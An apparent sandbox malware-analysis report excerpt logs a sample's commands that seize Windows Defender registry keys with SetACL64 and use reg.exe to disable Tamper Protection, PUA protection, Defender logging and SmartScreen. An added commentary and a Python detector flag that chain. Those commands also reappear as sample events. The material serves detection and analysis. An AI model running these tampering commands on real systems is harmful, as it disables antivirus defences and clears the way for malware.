Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Mpuser" /v "MpEnablePus" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
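The process tree above is a complete Defender-tampering procedure: SetACL64 takes ownership of four Windows Defender registry keys and grants Administrators full control, after which reg.exe writes the values that turn off the AV engine, Tamper Protection, the Defender ETW autologgers and SmartScreen. The ownership change is what makes the later writes possible (which is why the sample runs it first), so it is the higher-value detection signal; the reg.exe writes on their own are noisy because many of the same values are set legitimately by policy. The following Python is an added example, not part of the Joe Sandbox report or of the sample, that flags this chain in process-creation records. Field names (ParentProcessId, Image, CommandLine) are an assumption modelled on Sysmon Event ID 1, and the sample events and PIDs are constructed from the command lines in the report. It goes slightly beyond the page by also watching DisableRealtimeMonitoring and by ignoring writes that set a monitored value to its protective state.

```python
"""Added example (not part of the Joe Sandbox report or of the sample): flag the
Defender-tampering chain from process-creation records.

Event field names are an assumption modelled on Sysmon Event ID 1; SAMPLE_EVENTS
is constructed from the report's command lines with made-up PIDs.
"""
import re
from collections import defaultdict

# Registry trees whose takeover or modification is a Defender-tampering signal.
MONITORED_KEY_PREFIXES = (
    r"hklm\software\microsoft\windows defender",
    r"hklm\software\policies\microsoft\windows defender",
    r"hklm\system\currentcontrolset\control\wmi\autologger\defenderapilogger",
    r"hklm\system\currentcontrolset\control\wmi\autologger\defenderauditlogger",
)

# Value name -> data meaning "protection off"; None = any write is suspicious.
# DisableRealtimeMonitoring is not in the report; it is the most common sibling.
TAMPER_VALUES = {
    "disableantivirus": ("1",),
    "disableantispyware": ("1",),
    "disablerealtimemonitoring": ("1",),
    "tamperprotection": ("4",),          # 5 = on, 4 = off
    "tamperprotectionsource": None,
    "puaprotection": ("0",),
    "disableautoexclusions": ("1",),
    "start": ("0",),                     # Autologger Start=0 silences Defender ETW
}

REG_ADD = re.compile(
    r'\breg(?:\.exe)?\s+add\s+"?(?P<key>[^"]+?)"?\s+/v\s+"?(?P<value>[^"\s]+)"?'
    r'.*?/d\s+"?(?P<data>[^"\s]+)"?', re.I)
# SetACL syntax as used by the sample: -on <object> -ot reg -actn setowner|ace
SETACL = re.compile(
    r'-on\s+"(?P<key>[^"]+)"\s+-ot\s+reg\s+-actn\s+(?P<action>setowner|ace)', re.I)


def _normalize(key):
    """Lower-case and shorten the hive name so prefix matching is stable."""
    return re.sub(r"^hkey_local_machine", "hklm", key.strip().lower())


def is_monitored_key(key):
    k = _normalize(key)
    return any(k == p or k.startswith(p + "\\") for p in MONITORED_KEY_PREFIXES)


def classify(cmdline):
    """Return (kind, key, detail) for a tampering command line, else None."""
    m = SETACL.search(cmdline)
    if m and is_monitored_key(m.group("key")):
        return ("acl_takeover", m.group("key"), m.group("action").lower())
    m = REG_ADD.search(cmdline)
    if m and is_monitored_key(m.group("key")):
        name, data = m.group("value").lower(), m.group("data").lower()
        bad = TAMPER_VALUES.get(name)
        if name in TAMPER_VALUES and (bad is None or data in bad):
            return ("defender_disable", m.group("key"), f"{m.group('value')}={data}")
    return None


def correlate(events):
    """Group findings by parent process. An ACL takeover followed by a disabling
    write from the same parent is the high-confidence pattern; a takeover alone
    or repeated disabling writes alone are medium."""
    by_parent = defaultdict(list)
    for ev in events:
        finding = classify(ev["CommandLine"])
        if finding:
            by_parent[ev["ParentProcessId"]].append(finding)
    alerts = []
    for ppid, findings in by_parent.items():
        kinds = [f[0] for f in findings]
        if "acl_takeover" in kinds:
            chained = "defender_disable" in kinds[kinds.index("acl_takeover") + 1:]
            alerts.append({"parent_pid": ppid, "findings": findings,
                           "severity": "high" if chained else "medium"})
        elif kinds.count("defender_disable") >= 2:
            alerts.append({"parent_pid": ppid, "findings": findings, "severity": "medium"})
    return alerts


# Constructed events mirroring the report's cmd.exe -> SetACL64 / reg.exe chain.
SAMPLE_EVENTS = [
    {"ParentProcessId": 5972, "Image": r"C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe",
     "CommandLine": r'SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"'},
    {"ParentProcessId": 5972, "Image": r"C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe",
     "CommandLine": r'SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"'},
    {"ParentProcessId": 5972, "Image": r"C:\Windows\SysWOW64\reg.exe",
     "CommandLine": r'reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f'},
    {"ParentProcessId": 5972, "Image": r"C:\Windows\SysWOW64\reg.exe",
     "CommandLine": r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f'},
    # Benign: an unrelated key, and a Defender policy value set to its protective state.
    {"ParentProcessId": 5972, "Image": r"C:\Windows\SysWOW64\reg.exe",
     "CommandLine": r'reg add "HKCU\Software\Contoso\App" /v "FirstRun" /t reg_DWORD /d 0 /f'},
    {"ParentProcessId": 4100, "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "1" /f'},
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert["severity"], alert["parent_pid"], *alert["findings"], sep="\n  ")
```

Two practical notes. The rule keys on the command line rather than on the child image, because the report itself shows many children logged only as "unknown unknown" and because SetACL can be renamed; the `-ot reg -actn setowner` syntax is the stable part. In production the grouping key should be the parent's process GUID plus a short time window rather than a bare PID, which is reused.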
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe | Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe | Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: activeds.dll
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: adsldpc.dll
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: adsldpc.dll
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: logoncli.dll
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: dfscli.dll
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: activeds.dll
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: adsldpc.dll
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: logoncli.dll
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: dfscli.dll
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: activeds.dll
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: adsldpc.dll
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: logoncli.dll
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: dfscli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: activeds.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: adsldpc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: dfscli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: activeds.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: adsldpc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: dfscli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: activeds.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: adsldpc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: dfscli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: activeds.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: adsldpc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: dfscli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: activeds.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: adsldpc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: dfscli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: Ms63nDrOBa.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Code\SetACL3\Source\SetACL.exe\x64\Release\SetACL.pdbG source: SetACL64.exe, 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000004.00000000.2139148802.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000002.2144133422.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.2143385127.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.2144794323.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.2145879994.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.2146220599.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.2147316022.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.2151463967.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.2147801505.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.2152310864.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.2153178276.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000000.2153676169.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000002.2154453959.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000000.2154984222.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000002.2156028330.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.dr
Source: Binary string: D:\Projects\New\win_version_csharp\obj\Release\win_version_csharp.pdb source: win_version_csharp.exe.0.dr
Source: Binary string: D:\Projects\ConsoleApplication9\ConsoleApplication9\obj\Release\ConsoleApplication9.pdb source: uxdabweej.exe.0.dr
Source: Binary string: D:\Code\SetACL3\Source\SetACL.exe\x64\Release\SetACL.pdb source: SetACL64.exe, 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000004.00000000.2139148802.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000002.2144133422.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.2143385127.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.2144794323.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.2145879994.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.2146220599.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.2147316022.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.2151463967.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.2147801505.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.2152310864.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.2153178276.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000000.2153676169.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000002.2154453959.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000000.2154984222.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, 